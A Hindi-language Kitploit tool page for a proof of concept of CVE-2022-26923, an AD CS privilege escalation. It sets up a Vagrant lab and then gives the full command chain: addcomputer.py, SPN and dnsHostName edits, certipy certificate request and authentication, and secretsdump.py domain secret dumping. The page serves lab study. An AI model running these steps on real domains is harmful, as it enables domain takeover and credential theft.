Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26923 — CVE-2022-26923 का शोषण करने वाला एक प्रूफ ऑफ कॉन्सेप्ट। | Kitploit
उपकरण/GitHubGitHub/gh-badr/cve-2022-26923
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubgh-badr/cve-2022-26923

CVE-2022-26923

CVE-2022-26923 का शोषण करने वाला एक प्रूफ ऑफ कॉन्सेप्ट।

रिपॉजिटरी देखें
2212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26923

विवरण

यह भेद्यता एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को Active Directory Certificate Services (AD CS) सर्वर भूमिका स्थापित डिफ़ॉल्ट Active Directory वातावरण में डोमेन व्यवस्थापक तक विशेषाधिकार बढ़ाने की अनुमति देती है।

यह मुख्य रूप से Active Directory Certificate Services (AD CS) भूमिका से संबंधित है। AD CS भूमिका एक Windows Server भूमिका है जो आपको अपने संगठन के लिए सार्वजनिक कुंजी अवसंरचना (PKI) बनाने तथा सार्वजनिक कुंजी क्रिप्टोग्राफी, डिजिटल प्रमाणपत्र और डिजिटल हस्ताक्षर क्षमताएँ प्रदान करने की अनुमति देती है। AD CS भूमिका का उपयोग उपयोगकर्ताओं, कंप्यूटरों और सेवाओं के लिए प्रमाणपत्र जारी करने के लिए किया जाता है।

विषय-सूची

  • CVE-2022-26923
    • विवरण
    • विषय-सूची
    • पूर्वापेक्षाएँ
    • पर्यावरण
    • शोषण
    • अवधारणा का प्रमाण
    • संदर्भ

पूर्वापेक्षाएँ

  • Vagrant
  • VirtualBox

पर्यावरण

उपयोग किया गया Windows Server संस्करण Windows Server 2019 Standard Evaluation है, जो भेद्य संस्करण है। प्रदान की गई Vagrantfile (Vulnerable Machine फ़ोल्डर में) एक Windows Server 2019 VM बनाएगी जिसमें AD CS भूमिका स्थापित और कॉन्फ़िगर की गई है, साथ ही निम्नलिखित क्रेडेंशियल वाला एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता भी:

  • उपयोगकर्ता नाम: user
  • पासवर्ड: V@grant1

पर्यावरण बनाने के लिए, इन चरणों का पालन करें:

  • पहले रिपॉजिटरी को क्लोन करें और CVE-2022-26923 निर्देशिका में जाएँ:
    root@kitploit:~
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    
  • यदि आपको डिफ़ॉल्ट IP पता बदलने की आवश्यकता है, तो आप Vagrantfile में निम्न पंक्ति में IP पते को प्रतिस्थापित करके ऐसा कर सकते हैं:
    root@kitploit:~
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    
  • फिर VM बनाने के लिए निम्न कमांड चलाएँ:
    root@kitploit:~
    cd 'Vulnerable Machine'
    vagrant up
    
  • यदि आपके पास certipy स्थापित लिनक्स मशीन नहीं है, तो आप निम्न कमांड चलाकर Attacker Machine निर्देशिका में प्रदान की गई vagrant मशीन का उपयोग कर सकते हैं:
    root@kitploit:~
    cd 'Attacker Machine'
    vagrant up
    

Attacker Machine फ़ोल्डर में एक vagrant मशीन के साथ एक शेल स्क्रिप्ट शामिल है जो certipy का नवीनतम संस्करण स्थापित करेगी। आप स्क्रिप्ट का उपयोग अपनी लिनक्स मशीन पर certipy स्थापित करने के लिए भी कर सकते हैं।

शोषण

हमलावर मशीन से कनेक्ट करने के लिए, Attacker Machine निर्देशिका से निम्न कमांड चलाएँ:

root@kitploit:~
vagrant ssh

अब जब आप हमलावर मशीन में हैं, तो आपको Windows Server का IP पता hosts फ़ाइल में जोड़ना होगा:

root@kitploit:~
echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts

नोट: यदि आपने भेद्य मशीन की Vagrantfile में IP पता बदला है, तो आपको इसे यहाँ भी बदलना होगा।

फिर, डोमेन में एक नया कंप्यूटर खाता बनाते हैं:

root@kitploit:~
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'

यह सत्यापित करने के लिए कि कंप्यूटर खाता बन गया है, Vulnerable Machine निर्देशिका से निम्न कमांड चलाकर user और पासवर्ड V@grant1 के साथ भेद्य मशीन से कनेक्ट करें:

root@kitploit:~
vagrant ssh

फिर, यह सत्यापित करने के लिए कि कंप्यूटर खाता बन गया है, निम्न कमांड चलाएँ:

root@kitploit:~
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName

इस मशीन खाते का dnsHostName CVEPC.vagrant.local है। हम इस dnsHostName को VAGRANT-K51B6U3.vagrant.local में बदलना चाहते हैं, जो डोमेन कंट्रोलर है।

ऐसा करने के लिए, हमें पहले निम्न कमांड चलाकर कंप्यूटर खाते CVEPC से Service Principal Name (SPN) हटाना होगा:

root@kitploit:~
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}

फिर हम निम्न कमांड चलाकर dnsHostName को VAGRANT-K51B6U3.vagrant.local में बदल सकते हैं:

root@kitploit:~
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
  • नोट: यह समझने के लिए कि हमें कंप्यूटर खाते का SPN क्यों हटाना पड़ा, आप प्रोजेक्ट रिपोर्ट (फ्रेंच में) देख सकते हैं। या आप संदर्भ अनुभाग में पहला लेख देख सकते हैं, जिसमें CVE के लेखक द्वारा विस्तृत विवरण दिया गया है।

अब जब हमारे पास dnsHostName VAGRANT-K51B6U3.vagrant.local वाला कंप्यूटर खाता है, तो हम हमलावर मशीन पर निम्न कमांड चलाकर भेद्य मशीन से एक दुर्भावनापूर्ण प्रमाणपत्र का अनुरोध कर सकते हैं:

root@kitploit:~
certipy req -username '[email protected]' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local

आपको वर्तमान निर्देशिका में vagrant-k51b6u3.pfx नामक एक प्रमाणपत्र मिलना चाहिए। यह जाँचने के लिए कि प्रमाणपत्र मान्य है, आप निम्न कमांड चलाकर certipy के auth टूल का उपयोग करें:

root@kitploit:~
certipy auth -pfx vagrant-k51b6u3.pfx

यदि प्रमाणपत्र मान्य है, तो आपको डोमेन कंट्रोलर का NTLM हैश मिलना चाहिए। जिसका उपयोग कई दुर्भावनापूर्ण तरीकों से किया जा सकता है।

अवधारणा का प्रमाण

अवधारणा के प्रमाण के रूप में, हम डोमेन में संग्रहीत सभी रहस्यों को पुनः प्राप्त करने के लिए NTLM हैश का उपयोग कर सकते हैं (जैसा कि CVE के लेखक के लेख में समझाया गया है)। ऐसा करने के लिए, हम impacket सूट से secretsdump.py टूल का उपयोग कर सकते हैं (जो certipy के नवीनतम संस्करण के साथ स्थापित होता है)।

टूल का उपयोग करने के लिए, निम्न कमांड चलाएँ:

root@kitploit:~
secretsdump.py 'vagrant.local/[email protected]' -hashes :<NTLM hash>

<NTLM hash> को पिछले चरण से प्राप्त NTLM हैश से बदलें।

परिणामस्वरूप, आपको डोमेन में संग्रहीत सभी रहस्य मिल जाने चाहिए।

संदर्भ

  • Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
  • GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  • Try Hack Me - CVE-2022-26923
टूल डाउनलोड करें